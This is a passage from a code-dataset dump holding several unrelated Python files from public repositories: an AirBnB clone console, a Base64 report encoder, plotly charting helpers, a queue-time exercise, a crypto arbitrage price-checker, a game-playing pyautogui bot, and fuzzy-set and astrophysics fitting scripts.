command_parts[1].split('\"')[1]\n self.do_show(f\"{command_parts[0]} {instance_id}\")\n elif command_parts[1].startswith(\"destroy\"):\n # Extract the ID from the destroy command\n instance_id = command_parts[1].split('\"')[1]\n self.do_destroy(f\"{command_parts[0]} {instance_id}\")\n elif command_parts[1].startswith(\"update\"):\n # Extract various parts of the update command\n arguments = re.findall(r'\\b(?:\\w+-)*\\w+\\b|\\d+',\n command_parts[1])\n class_name, inst_id, att_name, att_value = (\n command_parts[0],\n arguments[1],\n arguments[2],\n arguments[3]\n )\n if len(arguments) == 4:\n # The exact number of arguments expected by do_update\n self.do_update(\n f\"{class_name} {inst_id} {att_name} {att_value}\"\n )\n elif len(arguments) == 6:\n # Two extra arguments so we call do_update twice\n att_name1 = arguments[4]\n att_value1 = arguments[5]\n self.do_update(\n f\"{class_name} {inst_id} {att_name} {att_value}\"\n )\n self.do_update(\n f\"{class_name} {inst_id} {att_name1} {att_value1}\"\n )\n\n def do_quit(self, arg):\n \"\"\"Quit command to exit the program\n \"\"\"\n return True\n\n def do_EOF(self, arg):\n \"\"\"(Ctrl + D) to force the program to exit\n \"\"\"\n return True\n\n def do_create(self, arg):\n \"\"\"Creates a new instance of the specified class;\n Ex: $ create BaseModel\n \"\"\"\n if not arg:\n print(\"** class name missing **\")\n return\n\n if arg in HBNBCommand.all_classes and isinstance(globals()[arg], type):\n my_instance = globals()[arg]() # Equivalent to my_instance = arg()\n my_instance.save()\n print(my_instance.id)\n else:\n print(\"** class doesn't exist **\")\n\n def do_show(self, arg):\n \"\"\"Prints 
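For reference, here is what the `re.findall` pattern in the console's `default()` method extracts from a dot-syntax update command (sample input invented):

```python
import re

cmd = 'update("1234-abcd", "first_name", "John")'
print(re.findall(r'\b(?:\w+-)*\w+\b|\d+', cmd))
# ['update', '1234-abcd', 'first_name', 'John'] -> arguments[1:] feed do_update
```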
the string representation of an instance\n based on the class name and id.\n \"\"\"\n if not arg:\n print(\"** class name missing **\")\n return\n\n args = arg.split()\n if len(args) < 2:\n print(\"** instance id missing **\")\n else:\n class_name = args[0]\n instance_id = args[1]\n\n if (\n class_name in globals()\n and isinstance(globals()[class_name], type)\n ):\n all_objs = storage.all()\n instance_found = False\n\n for obj_id, obj in all_objs.items():\n if (\n obj.id == instance_id\n and isinstance(obj, globals()[class_name])\n ):\n print(str(obj))\n instance_found = True\n break\n\n if not instance_found:\n print(\"** no instance found **\")\n\n else:\n print(\"** class doesn't exist **\")\n\n def do_count(self, line):\n \"\"\"Returns the number of instances of a class\n Usage: .count()\n \"\"\"\n numb_instances = len([value for key, value in storage.all().items()\n if key.startswith(line[0])])\n print(numb_instances)\n\n def do_destroy(self, line):\n \"\"\"Deletes an instance based on the class name and id\n (and saves the changes). Ex: $ destroy BaseModel 1234-1234-1234\n \"\"\"\n args = line.split()\n if not args:\n print(\"** class name missing **\")\n return\n\n class_name = args[0]\n if class_name not in globals():\n print(\"** class doesn't exist **\")\n return\n\n if len(args) < 2:\n print(\"** instance id missing **\")\n return\n\n obj_id = args[1]\n all_objs = storage.all()\n\n key = f\"{class_name}.{obj_id}\"\n if key in all_objs:\n del all_objs[key] # Delete the instance from storage\n storage.save() # Save the changes to the storage\n else:\n print(\"** no instance found **\")\n\n def do_all(self, line):\n \"\"\"Prints all string representation of all\n instances based or not on the class name.\n \"\"\"\n args = line.split()\n list = []\n\n if not args:\n all_objs = storage.all().values()\n else:\n class_name = args[0]\n if class_name not in self.all_classes:\n print(\"** class doesn't exist **\")\n return\n all_objs = [obj for obj in storage.all().values()\n if obj.__class__.__name__ == class_name]\n\n objs_formatted = [f\"[{str(obj)} {obj.to_dict()}]\"\n for obj in all_objs]\n\n for obj in objs_formatted:\n print(obj)\n\n def do_update(self, arg):\n \"\"\"\n Updates an instance based on the class name\n and id by adding or updating attribute\n \"\"\"\n args = shlex.split(arg)\n if not args:\n print(\"** class name missing **\")\n else:\n class_name = args[0]\n if (class_name in globals() and\n isinstance(globals()[class_name], type)):\n if len(args) < 2:\n print(\"** instance id missing **\")\n else:\n instance_id = args[1]\n all_objs = storage.all()\n instance_found = False\n for obj_id, obj in all_objs.items():\n if obj.id == instance_id:\n if len(args) < 3:\n print(\"** attribute name missing **\")\n else:\n if len(args) < 4:\n print(\"** value missing **\")\n else:\n attr_name = args[2]\n attr_value = args[3]\n if (attr_name not in\n ('id',\n 'created_at',\n 'updated_at')):\n if (isinstance(attr_value,\n (str, int, float))):\n setattr(obj, attr_name, attr_value)\n obj.save()\n instance_found = True\n break\n if not instance_found:\n print(\"** no instance found **\")\n else:\n print(\"** class doesn't exist **\")\n\n def emptyline(self):\n \"\"\"\n Prevents the previous command from being executed again if\n no command is given.\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n 
HBNBCommand().cmdloop()\n","repo_name":"AnsaYong/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":9178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20921105024","text":"import base64\nfrom time import sleep\nfrom Core.Support import Font\nfrom Core.Support import Language\nimport os\n\nfilename = Language.Translation.Get_Language()\n\nclass Encoder:\n\n @staticmethod\n def Encode(report):\n quest = int(input(Font.Color.BLUE + \"\\n[?]\" + Font.Color.WHITE + Language.Translation.Translate_Language(\n filename, \"Default\", \"Encode\", \"None\") + Font.Color.GREEN + \"\\n\\n[#MR.HOLMES#]\" + Font.Color.WHITE + \"-->\"))\n if quest == 1:\n EncodedFile = report.replace(\".txt\",\".mh\")\n f = open(report,\"r+\")\n reader = f.read()\n f.close()\n print(Font.Color.GREEN + \"\\n[+]\" + Font.Color.WHITE + \"ENCODING...\")\n sleep(3)\n encodingString = reader.encode(\"utf-8\")\n Base64_Byte = base64.b64encode(encodingString)\n FinalString = Base64_Byte.decode(\"utf-8\")\n f = open(EncodedFile,\"w+\",encoding=\"utf-8\")\n f.write(FinalString)\n f.close()\n print(Font.Color.YELLOW + \"[v]\" + Font.Color.WHITE + \"ENCODED REPORT: {}\".format(FinalString))\n # Round-trip decode, kept from the original as a sanity check.\n Message = FinalString\n Message1 = Message.encode(\"utf-8\")\n Message3 = base64.b64decode(Message1)\n Message4 = Message3.decode(\"utf-8\")\n #print(Message4)\n os.remove(report)\n print(Font.Color.GREEN + \"\\n[+]\" + Font.Color.WHITE + \"ENCODING FINISHED\")\n else:\n pass","repo_name":"kamaal44/Mr.Holmes","sub_path":"Core/Support/Encoding.py","file_name":"Encoding.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"74876430226","text":"\nfrom __future__ import annotations\n\nimport itertools\nimport functools\n\nimport typing\nimport numpy\nimport pandas\n\nimport plotly.express\nfrom plotly.express.colors import sample_colorscale\n\nfrom . import rendering\nfrom . 
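Stepping back to the Mr.Holmes `Encoder.Encode` routine above: the encode path is a plain UTF-8/Base64 round trip. Reduced to its essentials (the sample text is invented):

```python
import base64

report = "suspect: unknown"                      # invented sample text
encoded = base64.b64encode(report.encode("utf-8")).decode("utf-8")
decoded = base64.b64decode(encoded.encode("utf-8")).decode("utf-8")
assert decoded == report
print(encoded)  # c3VzcGVjdDogdW5rbm93bg==
```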
import densities\n\nimport xtuples as xt\n\n\n# ---------------------------------------------------------------\n\nRENDERING = {None: None}\nHTML = \"HTML\"\n\ndef set_rendering(val):\n RENDERING[None] = val\n\ndef return_chart(fig):\n if RENDERING[None] == HTML:\n return rendering.render_as_html(fig)\n return fig\n\n# ---------------------------------------------------------------\n\ndef df_color_scale(df, col, color_scale):\n colors = sample_colorscale(\n color_scale, \n numpy.linspace(0, 1, len(df[col].unique()))\n )\n color_map = {\n k: v for k, v in zip(\n sorted(df[col].unique()),\n colors,\n )\n }\n return color_map\n\n# ---------------------------------------------------------------\n\ndef df_chart(\n df,\n x=\"date\",\n y=\"value\",\n title=None,\n color: typing.Optional[str]=None,\n discrete_color_scale=None,\n width=750,\n height=400,\n f_plot = plotly.express.line,\n fig=None,\n f_df = None,\n **kws,\n):\n if f_df is not None:\n df = f_df(df)\n\n if color is not None:\n kws[\"color\"] = color\n\n if discrete_color_scale is not None:\n kws[\"color_discrete_map\"] = df_color_scale(\n df,\n color,\n discrete_color_scale\n )\n\n chart = f_plot(\n data_frame=df,\n x=x,\n y=y,\n title=title,\n **kws,\n )\n if fig is None:\n fig = chart\n else:\n fig.add_trace(chart.data[0])\n \n fig.update_layout(\n autosize=False,\n width=width,\n height=height,\n )\n\n return return_chart(fig)\n\ndf_line_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.line,\n render_mode=\"svg\",\n #\n)\n\ndf_bar_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.bar,\n #\n)\n\ndf_scatter_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.scatter,\n render_mode=\"svg\",\n #\n)\n\ndf_scatter_3d_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.scatter_3d,\n # render_mode=\"svg\",\n #\n)\n\ndf_line_3d_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.line_3d,\n # render_mode=\"svg\",\n #\n)\n\ndef f_df_density_df(gk, y, clip_quantile=.01):\n def f(df):\n gvs = df[gk].unique()\n vs = {\n gv: df[df[gk] == gv][y].values\n for gv in gvs\n }\n df = densities.gaussian_kde_1d_df(\n vs,\n key=gk,\n clip_quantile=clip_quantile,\n )\n return df\n return f\n\ndef df_density_chart(df, g, y, clip_quantile=.01, **kwargs):\n return df_line_chart(\n df,\n x=\"position\",\n y=\"density\",\n color=g,\n f_df = f_df_density_df(\n g, y, clip_quantile=clip_quantile\n ),\n **kwargs\n )\n\n# ---------------------------------------------------------------\n\ndef df_facet_chart(\n df,\n x=\"date\",\n y=\"value\",\n title=None,\n facet=None,\n facet_row=None,\n facet_col=None,\n color=None,\n discrete_color_scale=None,\n share_y=False,\n share_x=False,\n width=750,\n height=400,\n fig=None,\n f_plot = plotly.express.line,\n f_df = None,\n **kws,\n):\n if f_df is not None:\n df = f_df(df)\n\n if facet_row is None and facet is not None:\n assert facet_col is None, facet_col\n facet_row = facet\n\n if color is not None:\n kws[\"color\"] = color\n\n if discrete_color_scale is not None:\n kws[\"color_discrete_map\"] = df_color_scale(\n df,\n color,\n discrete_color_scale\n )\n\n chart = f_plot(\n data_frame=df,\n x=x,\n y=y,\n facet_row=facet_row,\n facet_col=facet_col,\n title=title,\n **kws,\n )\n if fig is None:\n fig = chart\n else:\n fig.add_trace(chart.data[0])\n\n if not share_x:\n fig.update_xaxes(matches=None, showticklabels=True)\n if not share_y:\n fig.update_yaxes(matches=None, showticklabels=True)\n\n fig.update_layout(\n autosize=False,\n width=width,\n 
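`df_color_scale` above pairs each sorted unique value of a column with an evenly spaced sample of a continuous colorscale. A standalone illustration with made-up data:

```python
import numpy
import pandas
from plotly.express.colors import sample_colorscale

df = pandas.DataFrame({"g": ["b", "a", "c"], "v": [1, 2, 3]})
colors = sample_colorscale("Viridis", numpy.linspace(0, 1, df["g"].nunique()))
print(dict(zip(sorted(df["g"].unique()), colors)))  # {'a': 'rgb(...)', 'b': ..., 'c': ...}
```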
height=height * len(df[facet_row].unique()),\n )\n\n return return_chart(fig)\n\ndf_facet_line_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.line,\n render_mode=\"svg\",\n #\n)\n\ndf_facet_bar_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.bar,\n #\n)\n\ndf_facet_scatter_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.scatter,\n render_mode=\"svg\",\n #\n)\n\ndf_facet_scatter_3d_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.scatter_3d,\n render_mode=\"svg\",\n #\n)\n\ndf_facet_line_3d_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.line_3d,\n render_mode=\"svg\",\n #\n)\n\ndef df_density_facet_chart(df, g, y, clip_quantile=.01, **kwargs):\n return df_facet_line_chart(\n df,\n x=\"position\",\n y=\"density\",\n facet=g,\n f_df = f_df_density_df(\n g, y, clip_quantile=clip_quantile\n ),\n **kwargs\n )\n\ndef f_df_density_pair_df(columns, gk, clip_quantile=.01):\n def f(df):\n pairs = [\n pair for pair in itertools.combinations(columns, 2)\n if pair[0] != pair[1]\n ]\n vs = {\n \",\".join(\n _c if isinstance(_c, str) else str(_c)\n for _c in [x, y]\n ): (\n df[x].values,\n df[y].values,\n )\n for x, y in pairs\n }\n df = densities.gaussian_kde_2d_df(\n vs,\n key=gk,\n clip_quantile=clip_quantile,\n )\n return df\n return f\n\ndef df_density_pair_chart(\n df,\n key=\"key\",\n clip_quantile=.01,\n columns = None,\n excluding=xt.iTuple(),\n facet_col=None,\n separate=False,\n **kwargs\n):\n if facet_col is not None:\n excluding = excluding.append(facet_col)\n\n if columns is None:\n columns = [\n col for col in df.columns if col not in excluding\n ]\n\n f_df = f_df_density_pair_df(\n columns, key, clip_quantile=clip_quantile\n )\n\n if facet_col is not None:\n by_v = {\n v: f_df(df[df[facet_col] == v])\n for v in df[facet_col].unique()\n }\n df = pandas.concat([\n sub_df.assign(**{\n facet_col: [v for _ in sub_df.index]\n }) for v, sub_df in by_v.items()\n ])\n else:\n df = f_df(df)\n chart_kws = dict(\n x=\"x\",\n y=\"y\",\n color=\"density\",\n color_continuous_scale=\"Blues\",\n height=400,\n width=600,\n **kwargs,\n )\n if not separate:\n return df_facet_scatter_chart(\n df,\n share_x=False,\n share_y=False,\n facet_row=key,\n facet_col=facet_col,\n **chart_kws,\n )\n return [\n df_scatter_chart(\n df[df[key] == v],\n **chart_kws,\n )\n for v in df[key].unique()\n ]\n\ndef vector_rays(nd, ns, gs, xs, ys, zs = None, i = 0, g = 0):\n assert nd.shape[-1] == 2 if zs is None else 3\n if len(nd.shape) == 1:\n nd = [nd]\n for ray in nd:\n xs.extend([0, ray[0]])\n ys.extend([0, ray[1]])\n if zs is not None:\n zs.extend([0, ray[2]])\n ns.extend([i, i])\n gs.extend([g, g])\n i += 1\n return i, len(nd)\n\nimport jax\n\n\ndef vector_ray_plot(\n vs,\n color = \"n\",\n _3d = False,\n **kws,\n):\n \n ns: list = []\n gs: list = []\n xs: list = []\n ys: list = []\n rs: list = []\n cs: list = []\n zs: typing.Optional[list] = (None if not _3d else [])\n\n i = 0\n r = 0\n c = 0\n g = 0\n\n if isinstance(vs, (numpy.ndarray, jax.numpy.ndarray)):\n if len(vs.shape) == 2:\n vs = [vs]\n for g, _vs in enumerate(vs):\n i, m = vector_rays(_vs, ns, gs,xs, ys, zs = zs, i = i, g=g)\n for _ in range(m):\n rs.extend([r, r])\n cs.extend([c, c])\n\n elif isinstance(vs, (list, xt.iTuple, tuple)):\n if isinstance(vs[0], (numpy.ndarray, jax.numpy.ndarray)):\n vs = [vs]\n for r, rvs in enumerate(vs):\n for c, cvs in enumerate(rvs):\n if len(cvs.shape) == 2:\n cvs = [cvs]\n for g, _cvs in enumerate(cvs):\n i, m = 
vector_rays(_cvs, ns,gs, xs, ys, zs=zs, i = i, g=g)\n for _ in range(m):\n rs.extend([r, r])\n cs.extend([c, c])\n i = 0\n\n df_cols = {\n \"n\": ns,\n \"x\": xs,\n \"y\": ys,\n \"r\": rs,\n \"c\": cs,\n \"g\": gs,\n }\n if _3d:\n assert zs is not None\n df_cols[\"z\"] = zs\n\n df = pandas.DataFrame(df_cols)\n\n f_chart = (\n df_line_chart\n if len(set(rs)) == 1 and not _3d\n else df_facet_line_chart\n if not _3d\n else df_line_3d_chart\n if len(set(rs)) == 1\n else df_facet_line_3d_chart\n )\n\n return f_chart(\n df,\n x=\"x\",\n y=\"y\",\n color=color,\n **({} if _3d else dict(\n facet_row = (\n \"r\" if len(set(rs)) > 1 else None\n ),\n facet_col = (\n \"c\" if len(set(cs)) > 1 else None\n ),\n )),\n **({} if not _3d else dict(z=\"z\")),\n **kws,\n )\n\n# ---------------------------------------------------------------\n\ndef func_graph_labels(d, dp = 2, **kwargs):\n def f_format(_v):\n return (\n ('{0:.' + '{}'.format(dp) + 'f}').format(_v)\n if isinstance(_v, float)\n else str(_v) \n )\n return {\n k: (\n \"_\".join([\n \"{}={}\".format(kk, f_format(vv))\n for kk, vv in d.items()\n ])\n if v is True\n else \"_\".join([\n \"{}={}\".format(kk, f_format(d[kk]))\n for kk in v\n ])\n )\n for k, v in kwargs.items()\n if v is not None and not isinstance(v, str)\n }\n\ndef round_if_numeric(dp):\n def f(v):\n if isinstance(v, (\n float, numpy.ndarray, jax.numpy.ndarray\n )):\n return round(v, dp)\n return v\n return f\n\ndef func_graph(\n f,\n locs, #dict\n params, # dict\n color=None,\n line_group=None,\n facet_row=None,\n facet_col=None,\n hover_name = True,\n x=\"x\",\n y=\"f\",\n df_chart=df_facet_line_chart,\n dp=2,\n **kwargs,\n): \n loc_dicts = (\n xt.iTuple(itertools.product(\n *xt.iTuple(locs.values()).map(\n xt.map(round_if_numeric(dp))\n )\n ))\n .map(xt.iTuple(locs.keys()).zip)\n .map(dict)\n )\n param_dicts = (\n xt.iTuple(itertools.product(\n *xt.iTuple(params.values()).map(\n xt.map(round_if_numeric(dp))\n )\n ))\n .map(xt.iTuple(params.keys()).zip)\n .map(dict)\n )\n data = param_dicts.product_with(loc_dicts).map(lambda ds: (\n dict(xt.iTuple(ds).map(lambda d: d.items()).flatten())\n )).map(lambda d: dict(\n **d,\n **func_graph_labels(\n d,\n dp=dp,\n color=color,\n line_group=line_group,\n facet_row=facet_row,\n facet_col=facet_col,\n hover_name = hover_name,\n ),\n **dict(f=f(**d)),\n ))\n df = pandas.DataFrame(data)\n kws = {\n k: (k if not isinstance(v, str) else v)\n for k, v in {\n \"color\": color,\n \"line_group\": line_group,\n \"facet_row\": facet_row,\n \"facet_col\": facet_col,\n \"hover_name\": hover_name,\n }.items()\n if v\n }\n return df_chart(\n df,\n x=x,\n y=y,\n **kws,\n **kwargs,\n )\n# ---------------------------------------------------------------\n","repo_name":"tomjrwilliams/xfactors","sub_path":"src/xfactors/visuals/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":12262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1046037186","text":"#https://www.codewars.com/kata/57b06f90e298a7b53d000a86\n\nimport pprint\nimport json\n\ndef queue_time(customers, n):\n queues=[]\n cashierCustCount={}\n customerCounter=0\n customerInfo={}\n #makes my queue list the length of how many cashiers (n) i have avalible\n for x in range(n):\n queues.append(0)\n cashierCustCount[x+1]=0\n\n for i in range(len(customers)):\n index = queues.index(min(queues))\n customerCounter+=1\n\n customerInfo=feedCustAPI(i,customerInfo,customers,queues,index)\n queues[index]+=customers[i]\n 
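The queueing rule implemented in `queue_time` above (each customer joins the currently shortest till; the answer is the busiest till's total) reduces to this standalone sketch:

```python
def total_time(customers, n):
    tills = [0] * n
    for c in customers:
        tills[tills.index(min(tills))] += c   # shortest queue takes the customer
    return max(tills)

print(total_time([5, 3, 4], 1))   # 12
print(total_time([2, 3, 10], 2))  # 12
```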
cashierCustCount[index+1]+=1\n\n cashierInfo=cashierFile(cashierCustCount,queues, customerInfo)\n final=combineFiles(cashierInfo,customerInfo)\n pprintAPI(final)\n printToText(final)\n return max(queues)\n\ndef combineFiles(f1, f2):\n file={\"Cashier Info\": f1, \"Customer Info\": f2}\n return file\n\ndef cashierFile(custCount, time, custInfo):\n cashierFile={}\n\n for z in custCount:\n cashierFile[z]={\"Cashier\": z, \"helped\":{\"Count\":custCount.get(z), \"Customers\":[]}, \"total work time\": time[z - 1]}\n\n\n for y in custInfo:\n if custInfo[y]['queue visited']==cashierFile[z][\"Cashier\"]:\n cashierFile[z]['helped']['Customers'].append(y)\n\n return cashierFile\n\ndef pprintAPI(file):\n pprint.pprint(file)\n\ndef printToText(file):\n fileName=input(\"What do you want to name your file? \")\n file=json.dumps(file)\n with open(f'{fileName}.json','a') as f:\n f.write(file)\n\ndef feedCustAPI(x,customerInfo,customers,queues, index):\n customerInfo[x + 1] = {'length of checkout': customers[x], 'wait time': queues[index], 'queue visited': index+1}\n return customerInfo\n\nif __name__==\"__main__\":\n #fill with any information that you have\n cust=[1,2,3,1,7,5,6,7,8,4,1,2,3,4,5,6,5,4,7,6,5,4,3,2,1,3,4,6]\n n=8\n print(f'{queue_time(cust, n)} is the time it would take {len(cust)} customers with {n} cashiers')\n","repo_name":"jaceiverson/Python-Projects","sub_path":"CodeWars/queueTimes.py","file_name":"queueTimes.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22195059356","text":"# start --script 2script.py\n\nfrom decimal import Decimal\n\nfrom hummingbot.strategy.script_strategy_base import ScriptStrategyBase\nfrom hummingbot.core.utils.trading_pair_fetcher import TradingPairFetcher\n\ns_decimal_0 = Decimal(0)\n\n\nclass ArbitrageFinder1(ScriptStrategyBase):\n # It is best to first use a paper trade exchange connector\n # while coding your strategy, once you are happy with it\n # then switch to real one.\n arbitrage_markets = [\"gate_io_paper_trade\", \"ascend_ex_paper_trade\"]\n\n trading_pair_fetcher: TradingPairFetcher = TradingPairFetcher.get_instance()\n if trading_pair_fetcher.ready:\n trading_pairs_1 = trading_pair_fetcher.trading_pairs.get(arbitrage_markets[0], [])\n trading_pairs_2 = trading_pair_fetcher.trading_pairs.get(arbitrage_markets[1], [])\n trading_pairs_set = list(set(trading_pairs_1).intersection(trading_pairs_2))\n trading_pairs_set = trading_pairs_set[0:50]\n\n markets = {arbitrage_markets[0]: trading_pairs_set, arbitrage_markets[1]: trading_pairs_set}\n min_profitability = Decimal('0.007')\n\n def on_tick(self):\n self.logger().info(f\"trading_pairs_1 {self.trading_pairs_set}\")\n self.notify_hb_app_with_timestamp(f\"1: {self.arbitrage_markets[0]}; 2: {self.arbitrage_markets[1]}\")\n for pair in self.trading_pairs_set:\n try:\n market_1_bid = self.connectors[self.arbitrage_markets[0]].get_price(pair, False)\n market_1_ask = self.connectors[self.arbitrage_markets[0]].get_price(pair, True)\n market_2_bid = self.connectors[self.arbitrage_markets[1]].get_price(pair, False)\n market_2_ask = self.connectors[self.arbitrage_markets[1]].get_price(pair, True)\n profitability_buy_1_sell_2 = market_1_bid / market_2_ask - 1\n profitability_buy_2_sell_1 = market_2_bid / market_1_ask - 1\n\n if profitability_buy_1_sell_2 > self.min_profitability:\n self.notify_hb_app_with_timestamp(f\"{pair}: buy_1_sell_2: {profitability_buy_1_sell_2:.5f}\")\n if profitability_buy_2_sell_1 
> self.min_profitability:\n self.notify_hb_app_with_timestamp(f\"{pair}: buy_2_sell_1: {profitability_buy_2_sell_1:.5f}\")\n except BaseException:\n self.logger().info(f\"{pair} has no bid or ask order book\")\n","repo_name":"andrewsiah/Arbitrage_Bot","sub_path":"scripts/arbitragefinder1.py","file_name":"arbitragefinder1.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5163504664","text":"#! python3\n# -- cardinalBot.py -- little bot to autonomously play the game Cardinal under the following URL:\n# https://www.newgrounds.com/portal/view/634256\n\n### Hufi\n### 25/07/2020 - 27/07/2020\n\nimport pyautogui, sys, os, time, logging, webbrowser\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s.%(msecs)03d: %(message)s', datefmt='%H:%M:%S')\n#logging.disable(logging.DEBUG) # uncomment to block debug log messages\n\n\ndef imgPath(image):\n # makes it easier to generate the path used to locate the image files.\n return os.path.join('FILEPATH IMAGES' + image)\n\n# VARIABLES USED:\n\nGAME_REGION = () # region where the game is located on screen.\n\n\nscore = 0 # well, the score.\n\n\ndef main():\n # main function calling every other function in the game. Called at the very end.\n logging.debug('Program Started. Press Ctrl-C to abort at any time.')\n logging.debug('To interrupt mouse movement, move mouse to upper left corner.')\n openGame()\n locateGameRegion()\n startGame()\n playGame()\n checkLost() # note: playGame() loops until the bot exits, so this is never reached\n\ndef openGame():\n game = webbrowser.open('https://www.newgrounds.com/portal/view/634256') # open the webpage in browser.\n time.sleep(15) # timer to let the webpage load\n\n\n\ndef locateGameRegion():\n # function to recognize and locate the game on the screen.\n global GAME_REGION\n region = pyautogui.locateOnScreen(imgPath('press_m_to_mute.png')) # lower left corner used as starting point for calculation.\n if region is None: # because it is always looking the same (press m to mute)\n raise Exception('Could not find the game on the screen.') # Exception to let us know that the game isn't visible.\n\n topLeftX = region[0]\n topLeftY = region[1] + region[3] - 550 # image (upper border) + [abs. height of img] minus game height.\n GAME_REGION = (topLeftX, topLeftY, 550, 550) # game region coordinates, height and width\n logging.debug('Game region found: %s' % (GAME_REGION,))\n\n\n\ndef startGame():\n # clicks the center of the game and then starts the game.\n dot = pyautogui.locateCenterOnScreen(imgPath('center.png'), region=GAME_REGION)\n pyautogui.click(dot) # click center\n time.sleep(0.75)\n pyautogui.press('space') # start game by pressing space\n pyautogui.press('m') # mute the game (the sound is annoying when playing it for the 17596th time.)\n\n\ndef playGame():\n global score\n while True:\n time.sleep(0.4) # gives us a little extra time in between each pattern\n screenshot = pyautogui.screenshot() # creates new screenshot to use within each loop\n if screenshot.getpixel((GAME_REGION[0] + 504, GAME_REGION[1] + 537)) == (170, 16, 48):\n # color code of the red color used in the game. if this specific pixel (within the \"T\" in press Space To play) is red, then the game is stopped/lost.\n logging.debug('You lost. Your Score: %s' % (score-6)) # Score: subtract 6 to get the actual points (beginning and end produce multiple entries).\n
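The profitability test in the arbitrage bot's `on_tick` above is just the cross-exchange price ratio measured against the threshold; with invented quotes:

```python
from decimal import Decimal

bid_1, ask_2 = Decimal("101.0"), Decimal("100.0")   # made-up quotes
profit = bid_1 / ask_2 - 1                          # buy on market 2, sell on market 1
print(profit, profit > Decimal("0.007"))            # 0.01 True: a 1% edge beats 0.7%
```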
 logging.debug('Do you want to play again? (Y/N)') # usually: 6 multiple entries per game --> therefore subtract that amount.\n antwort = input()\n if antwort.lower() == 'y':\n pyautogui.click((GAME_REGION[0] + 200, GAME_REGION[1] + 200))\n pyautogui.press('space') # restart game\n score = 0 # reset score\n\n else:\n logging.debug('Ok ciao!') # display goodbye msg\n time.sleep(3)\n sys.exit() # exit bot\n\n\n elif screenshot.getpixel((GAME_REGION[0] + 504, GAME_REGION[1] + 537)) != (170, 16, 48): # pixel not red here, therefore game is still going.\n\n if screenshot.getpixel((GAME_REGION[0] + 100, GAME_REGION[1] + 155)) != (176, 1, 26): # pixel within left red block is not red: left block missing.\n pyautogui.press(\"left\") # therefore: press 'left' key.\n logging.debug('left')\n score +=1\n\n elif screenshot.getpixel((GAME_REGION[0] + 483, GAME_REGION[1] + 155)) != (176, 1, 26):\n pyautogui.press(\"right\") # for the other 3 options: same with corresponding direction\n logging.debug('right')\n score +=1\n\n elif screenshot.getpixel((GAME_REGION[0] + 273, GAME_REGION[1] + 75)) != (176, 1, 26):\n pyautogui.press(\"up\")\n logging.debug('up')\n score +=1\n\n elif screenshot.getpixel((GAME_REGION[0] + 273, GAME_REGION[1] + 420)) != (176, 1, 26):\n pyautogui.press(\"down\")\n logging.debug('down')\n score +=1\n\n\n# actually running the program:\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"hufi1/Cardinal-Bot","sub_path":"cardinalBot.py","file_name":"cardinalBot.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21548353767","text":"'''\nA multi-attribute linear programming method where both the attribute values and the weights are intuitionistic fuzzy sets.\nThe main idea is to convert the intuitionistic fuzzy sets into interval values and solve for the weights over those intervals.\n'''\nfrom scipy import optimize as op\nimport pandas as pd # bikor algorithm implementation\nimport numpy as np\nnp.set_printoptions(suppress=True)\nw=[0.25,0.45,0.3]\ndef getdef(n): # load the matrix\n return pd.read_excel('D:\\study\\\\test\\data\\\\t13.xlsx',sheet_name=n)\ndef getmatirx(df):\n df.iloc[:, [i % 2 == 1 for i in range(len(df.columns))]] = 1 - df.iloc[:,\n [i % 2 == 1 for i in range(len(df.columns))]]\n return df\ndef getliner(df):\n pass\ndef ranks(df):\n d1 = df.iloc[:, ::2]\n d2 = df.iloc[:, 1::2]\n df1=d1.T.reset_index(drop=True).T\n df2= d2.T.reset_index(drop=True).T\n print(df1)\n print(df2)\n gl=np.dot(df1,w)\n gu=np.dot(df2,w)\n print(gl)\n print(gu)\n g=gu/(1+gu-gl)\n return g\nif __name__ == '__main__':\n df =getdef(0)\n print(df)\n df1=getmatirx(df)\n print(df1)\n print(ranks(df1))","repo_name":"rivendelltom/ifs_learn","sub_path":"book/LP_Weight.py","file_name":"LP_Weight.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"17735055494","text":"import sys\nimport os\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table\n\nfrom combined_fit import spectrum as sp\nfrom combined_fit import constant,utilities\nfrom combined_fit import mass\nfrom combined_fit import tensor as ts\nfrom combined_fit import draw\n\n\n### Main ##########################################################\nif __name__ == \"__main__\":\n\n ################################# Inputs ##################################\n ###########################################################################\n\n #Injected masses\n A\t= [\t1,\t 4,\t14,\t28,\t56]\n Z\t= [\t1,\t 2, 7,\t14, 26]\n\n hadr_model = \"Sibyll\" #\"Sibyll\" or \"EPOS-LHC\"\n logRmin = 17.8 #Integrate the injected spectrum from logR_min to get total energy x k\n 
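The interval score returned by `ranks()` in the LP_Weight record above is `g = gu / (1 + gu - gl)`. With invented lower/upper weighted utilities:

```python
import numpy as np

gl = np.array([0.40, 0.55])   # lower-bound weighted utilities
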